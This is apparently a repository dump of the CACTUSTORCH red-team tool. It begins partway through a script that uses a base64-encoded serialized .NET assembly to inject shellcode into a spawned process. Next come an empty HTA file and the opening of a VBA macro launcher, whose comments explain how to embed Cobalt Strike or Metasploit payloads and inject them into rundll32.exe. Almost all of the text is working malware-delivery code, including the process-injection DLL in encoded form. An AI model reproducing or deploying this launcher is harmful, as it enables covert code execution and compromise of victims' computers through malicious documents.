ms = CreateObject("System.IO.MemoryStream") 53 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 54 | ms.Position = 0 55 | Set Base64ToStream = ms 56 | End Function 57 | 58 | Sub Run 59 | Dim s, entry_class 60 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" 61 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" 62 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" 63 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" 64 | s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" 65 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" 66 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" 67 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" 68 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu" 69 | s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH" 70 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA" 71 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw" 72 | s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu" 73 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" 74 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u" 75 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5" 76 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR" 77 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA" 78 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y" 79 | 
s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh" 80 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz" 81 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA" 82 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy" 83 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA" 84 | s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA" 85 | s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA" 86 | s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 87 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA" 88 | s = s & "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA" 89 | s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA" 90 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA" 91 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT" 92 | s = s & "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA" 93 | s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME" 94 | s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR" 95 | s = s & "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA" 96 | s = s & "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR" 97 | s = s & "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V" 98 | s = s & "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA" 99 | s = s & "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu" 100 | s = s & 
"NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR" 101 | s = s & "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA" 102 | s = s & "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA" 103 | s = s & "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh" 104 | s = s & "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA" 105 | s = s & "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9" 106 | s = s & "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA" 107 | s = s & "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/" 108 | s = s & "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA" 109 | s = s & "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED" 110 | s = s & "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA" 111 | s = s & "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH" 112 | s = s & "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA" 113 | s = s & "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/" 114 | s = s & "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG" 115 | s = s & "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS" 116 | s = s & "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA" 117 | s = s & "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA" 118 | s = s & "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH" 119 | s = s & "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD" 120 | s = s & "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I" 121 | s = s & 
"AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF" 122 | s = s & "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA" 123 | s = s & "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+" 124 | s = s & "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA" 125 | s = s & "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE" 126 | s = s & "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A" 127 | s = s & "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ" 128 | s = s & "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA" 129 | s = s & "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw" 130 | s = s & "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB" 131 | s = s & "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz" 132 | s = s & "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA" 133 | s = s & "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA" 134 | s = s & "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy" 135 | s = s & "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP" 136 | s = s & "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V" 137 | s = s & "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD" 138 | s = s & "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV" 139 | s = s & "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW" 140 | s = s & "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf" 141 | s = s & "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf" 142 | s = s & 
"TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT" 143 | s = s & "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM" 144 | s = s & "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X" 145 | s = s & "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU" 146 | s = s & "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV" 147 | s = s & "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG" 148 | s = s & "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT" 149 | s = s & "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS" 150 | s = s & "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi" 151 | s = s & "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU" 152 | s = s & "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl" 153 | s = s & "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA" 154 | s = s & "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl" 155 | s = s & "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli" 156 | s = s & "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp" 157 | s = s & "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs" 158 | s = s & "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv" 159 | s = s & "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0" 160 | s = s & "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp" 161 | s = s & "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp" 162 | s = s & "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG" 163 | s = s & 
"cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr" 164 | s = s & "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy" 165 | s = s & "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj" 166 | s = s & "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk" 167 | s = s & "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj" 168 | s = s & "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT" 169 | s = s & "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz" 170 | s = s & "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD" 171 | s = s & "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA" 172 | s = s & "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB" 173 | s = s & "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj" 174 | s = s & "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0" 175 | s = s & "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl" 176 | s = s & "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0" 177 | s = s & "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP" 178 | s = s & "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB" 179 | s = s & "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O" 180 | s = s & "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA" 181 | s = s & "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA" 182 | s = s & "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA" 183 | s = s & "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC" 184 | s = s & 
"ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY" 185 | s = s & "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB" 186 | s = s & "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm" 187 | s = s & "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA" 188 | s = s & "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg" 189 | s = s & "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA" 190 | s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A" 191 | s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA" 192 | s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA" 193 | s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs" 194 | s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA" 195 | s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA" 196 | s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA" 197 | s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu" 198 | s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA" 199 | s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV" 200 | s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA" 201 | s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP" 202 | s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA" 203 | s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw" 204 | s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA" 205 | s = s & 
"LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 206 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 207 | s = s & "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 208 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 209 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 210 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 211 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 212 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 213 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 214 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 215 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 216 | s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv" 217 | s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA" 218 | entry_class = "cactusTorch" 219 | 220 | Dim fmt, al, d, o 221 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter") 222 | Set al = CreateObject("System.Collections.ArrayList") 223 | al.Add fmt.SurrogateSelector 224 | 225 | Set d = fmt.Deserialize_2(Base64ToStream(s)) 226 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 227 | o.flame binary,code 228 | End Sub 229 | 230 | SetVersion 231 | On Error Resume Next 232 | Run 233 | If Err.Number <> 0 Then 234 | Debug Err.Description 235 | Err.Clear 236 | End If -------------------------------------------------------------------------------- /CACTUSTORCH.hta: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/CACTUSTORCH.vba: -------------------------------------------------------------------------------- 1 | ' ( ) ( ) 2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 9 | ' 10 | ' Author: Vincent Yiu (@vysecurity) 11 | ' Credits: 12 | ' - @cn33liz: Inspiration with StarFighter 13 | ' - @tiraniddo: James Forshaw for DotNet2JScript 14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 15 | 16 | ' A VBA shellcode launcher for Macros. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 17 | ' Macro will not need to declare winapi :) 18 | 19 | ' Usage: 20 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | ' Run: cat payload.bin | base64 -w 0 > out.txt 23 | ' Run the payload through splitvba: python splitvba.py out.txt code.txt 24 | ' Copy code.txt into the section specified below. 25 | 26 | 27 | Sub SetVersion 28 | Dim shell 29 | Set shell = CreateObject("WScript.Shell") 30 | Dim ver 31 | ver = "v4.0.30319" 32 | On Error Resume Next 33 | shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\" 34 | If Err.Number <> 0 Then 35 | ver = "v2.0.50727" 36 | Err.Clear 37 | End If 38 | shell.Environment("Process").Item("COMPLUS_Version") = ver 39 | End Sub 40 | 41 | Public binary As String 42 | Public code As String 43 | 44 | Sub Init() 45 | ' Replace with binary name that you want to inject into. 
